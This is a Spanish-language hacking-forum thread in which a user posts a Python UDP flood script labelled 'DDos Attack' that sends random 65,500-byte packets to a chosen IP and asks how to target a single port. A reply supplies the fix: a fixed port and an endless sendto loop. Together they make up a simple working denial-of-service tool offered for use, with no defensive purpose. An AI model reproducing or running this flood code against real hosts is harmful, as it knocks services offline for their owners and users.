elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  como establesco un puerto en especifico?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: como establesco un puerto en especifico?  (Leído 2,157 veces)
Julio0

Desconectado Desconectado

Mensajes: 8


Ver Perfil
como establesco un puerto en especifico?
« en: 2 Junio 2019, 05:24 am »

#este es el código que tengo hasta ahora pero manda los packetes a muchos puertos indefinidamente yo solo quiero que lo mande a uno en espesifico esto me esta sacando de quicio.

#!/usr/bin/env python
# coding=utf-8
import os, sys
import time
import  socket
import random
#host && Port
target_host = raw_input("IP Target :")
target_port = input("Port :")
#packet
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(65500)
sock.sendto(bytes, (target_host, target_port))
os.system("clear")
os.system("figlet DDos Attack")
#conexion_client
sent = 1
pysendfile = 0
while True:

 print(sock, target_host, target_port)
           


En línea

@XSStringManolo
Hacker/Programador
Colaborador
***
Desconectado Desconectado

Mensajes: 2.397


Turn off the red ligth


Ver Perfil WWW
Re: como establesco un puerto en especifico?
« Respuesta #1 en: 2 Junio 2019, 07:38 am »

Si haces copia y pega al menos pon todo el codigo, la fuente y entre etiquetas. Se nota que faltan variables etc.

port = 80
while True:
sock.sendto(bytes, (ip,port))

No tiene más. No seas lamer.




DbhapsLeV634lyh
cZiXfyrñaxd8oqcveJ
sHa2rwdAeHuWnzaZvXu
Sewldtja/ailAaHs2lqe
ctjrCatsATCmAHm0ZTCmcDCxAYK
nbXxhfTCtATCxc36mJICwdjCicHgEvn5
hcHGlczCaZ
4KqdIRhb3mlAHmmJHymJHSwfTCubYN
hAHmmd3WaMjCUc4KzfTCxc4JhAXxhZ3
/EtXG7czClAXxhAHWaZ3mn
dnGlczxhcYWkbDCtc3AmMh==
Si descifras este msg puto crack.


« Última modificación: 2 Junio 2019, 08:20 am por string Manolo » En línea

Mi perfil de patrocinadores de GitHub está activo! Puedes patrocinarme para apoyar mi trabajo de código abierto 💖

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines